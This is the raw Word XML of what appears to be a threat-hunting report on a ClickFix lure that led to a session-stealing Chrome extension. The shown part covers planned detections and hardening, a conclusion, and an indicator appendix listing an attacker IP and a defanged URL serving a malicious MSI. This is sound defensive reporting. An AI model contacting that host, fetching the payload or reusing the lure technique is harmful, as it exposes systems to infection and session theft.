                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pending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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Behavioral detections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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Turn queries 1, 4 and 6 (lineage from explorer.exe, .NET with network activity, browser profile) into detections in Sentinel or Defender, with the documented exclusions.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pending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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Extensions outside the Web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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Via Chrome and Edge policy: an allowlist of extensions and blocking developer mode and unpacked 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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pending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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Win+R as a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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evaluate the GPO that removes “Run” from the Start menu for users with no technical need. ClickFix-specific awareness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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Under evaluation with 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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Visibility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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enable Script Block Logging across the fleet and add two detections: download commands in interactive PowerShell sessions (4104), and cmd.exe opened with no arguments launching PowerShell with a download (paste into a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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pending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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Next 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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Run query 7 across the entire fleet.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX (SOC)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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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bsveko6blhc" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hunt confirmed the hypothesis: a XXXX user pasted a command from a ClickFix lure into Win+R, and the chain ended in a Chrome extension capable of stealing sessions. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything the hunt found was already in the telemetry before the alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as ordinary events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The alert arrived almost five minutes after the first paste, and only because one of the attacker’s three IPs was on a reputation list. The detections this exercise leaves behind do not depend on that luck: they are behavior-based and keep working even if the attacker changes their infrastructure tomorrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As a result, the SOC gains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 behavioral detections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, declares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 visibility gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and opens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 new hypothesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the next hunt. Every hunt leaves the next one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">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jsepxhop1t1" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">APPENDIX A: IOC LIST</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429"/>
        <w:gridCol w:w="2900"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1700"/>
            <w:gridCol w:w="4429"/>
            <w:gridCol w:w="2900"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:tblHeader w:val="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="e6e6e6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="e6e6e6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="e6e6e6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Context</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7">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">86.109.75.7</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9">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Server hosting the script and the MSI</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A">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP (decimal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1450003207</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C">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The same IP, written in decimal in the pasted command</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D">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hxxp://86.109.75.7/app/40152518488f/235235.msi</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F">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Installer download</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0">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
            <w:pPr>
